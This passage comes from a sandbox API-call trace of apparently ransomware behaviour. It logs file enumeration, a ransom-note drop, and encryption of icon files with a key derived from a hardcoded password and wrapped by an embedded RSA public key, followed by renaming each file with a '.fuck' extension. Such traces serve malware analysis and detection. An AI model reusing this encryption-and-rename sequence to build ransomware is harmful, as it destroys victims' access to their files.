Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.fuck")) returned 0 [0239.723] CryptDestroyHash (hHash=0x28bf218) returned 1 [0239.723] CryptDestroyKey (hKey=0x28be858) returned 1 [0239.723] CryptReleaseContext (hProv=0x28d54d0, dwFlags=0x0) returned 1 [0239.723] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0239.723] FindClose (in: hFindFile=0x28bf1d8 | out: hFindFile=0x28bf1d8) returned 1 [0239.723] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\readme_back_files.htm")) returned 0xffffffff [0239.723] AreFileApisANSI () returned 1 [0239.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d52b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0239.724] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.724] GetLastError () returned 0x5 [0239.724] GetLastError () returned 0x5 [0239.724] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.724] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.724] GetLastError () returned 0x5 [0239.724] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico")) returned 0x20 [0239.724] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", dwFileAttributes=0x80) returned 0 [0239.725] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.725] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.725] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.726] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d56f0) returned 1 [0239.728] CryptCreateHash (in: hProv=0x28d56f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.728] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.728] CryptHashData (hHash=0x28bf018, pbData=0x2889240, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.728] CryptDeriveKey (in: hProv=0x28d56f0, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf218) returned 1 [0239.728] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.728] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.728] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d5bb8) returned 1 [0239.729] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5bb8, dwCertEncodingType=0x1, pInfo=0x28ca028*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca058*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca060*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be698) returned 1 [0239.729] CryptEncrypt (in: hKey=0x28be698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.729] CryptEncrypt (in: hKey=0x28be698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4f80*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d4f80*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.729] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4f80, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.729] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d9aa8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.729] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.729] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.729] CloseHandle (hObject=0xffffffff) returned 1 [0239.729] CloseHandle (hObject=0xffffffff) returned 1 [0239.729] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), bFailIfExists=0) returned 0 [0239.730] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", dwFileAttributes=0x0) returned 0 [0239.730] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg")) returned 0 [0239.731] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.fuck")) returned 0 [0239.731] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.731] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.731] CryptReleaseContext (hProv=0x28d56f0, dwFlags=0x0) returned 1 [0239.731] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.731] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.731] GetLastError () returned 0x5 [0239.731] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico")) returned 0x20 [0239.732] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", dwFileAttributes=0x80) returned 0 [0239.732] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.732] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.733] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.733] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d5888) returned 1 [0239.735] CryptCreateHash (in: hProv=0x28d5888, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.735] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.735] CryptHashData (hHash=0x28bf018, pbData=0x28893a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.735] CryptDeriveKey (in: hProv=0x28d5888, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf1d8) returned 1 [0239.735] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.736] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.736] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d54d0) returned 1 [0239.736] CryptImportPublicKeyInfo (in: hCryptProv=0x28d54d0, dwCertEncodingType=0x1, pInfo=0x28c8fe8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9018*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9020*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be498) returned 1 [0239.736] CryptEncrypt (in: hKey=0x28be498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.736] CryptEncrypt (in: hKey=0x28be498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d56f0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d56f0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.736] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d56f0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.736] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d9aa8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.736] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.736] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.736] CloseHandle (hObject=0xffffffff) returned 1 [0239.737] CloseHandle (hObject=0xffffffff) returned 1 [0239.737] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), bFailIfExists=0) returned 0 [0239.737] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", dwFileAttributes=0x0) returned 0 [0239.737] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg")) returned 0 [0239.738] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.fuck")) returned 0 [0239.738] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.738] CryptDestroyKey (hKey=0x28bf1d8) returned 1 [0239.738] CryptReleaseContext (hProv=0x28d5888, dwFlags=0x0) returned 1 [0239.738] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.738] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.738] GetLastError () returned 0x5 [0239.739] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico")) returned 0x20 [0239.739] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", dwFileAttributes=0x80) returned 0 [0239.740] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.740] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.740] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.741] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d52b0) returned 1 [0239.743] CryptCreateHash (in: hProv=0x28d52b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.743] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.743] CryptHashData (hHash=0x28bf1d8, pbData=0x2889448, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.743] CryptDeriveKey (in: hProv=0x28d52b0, Algid=0x6610, hBaseData=0x28bf1d8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf218) returned 1 [0239.743] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.743] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.743] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d5c40) returned 1 [0239.743] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5c40, dwCertEncodingType=0x1, pInfo=0x28c9ce8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9d18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9d20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be6d8) returned 1 [0239.743] CryptEncrypt (in: hKey=0x28be6d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.744] CryptEncrypt (in: hKey=0x28be6d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5b30*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5b30*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.744] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5b30, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.744] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d9aa8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.744] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.744] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.744] CloseHandle (hObject=0xffffffff) returned 1 [0239.744] CloseHandle (hObject=0xffffffff) returned 1 [0239.744] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), bFailIfExists=0) returned 0 [0239.744] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", dwFileAttributes=0x0) returned 0 [0239.745] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg")) returned 0 [0239.746] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.fuck")) returned 0 [0239.746] CryptDestroyHash (hHash=0x28bf1d8) returned 1 [0239.746] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.746] CryptReleaseContext (hProv=0x28d52b0, dwFlags=0x0) returned 1 [0239.746] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.746] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.746] GetLastError () returned 0x5 [0239.746] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico")) returned 0x20 [0239.746] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", dwFileAttributes=0x80) returned 0 [0239.747] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.747] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.747] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device 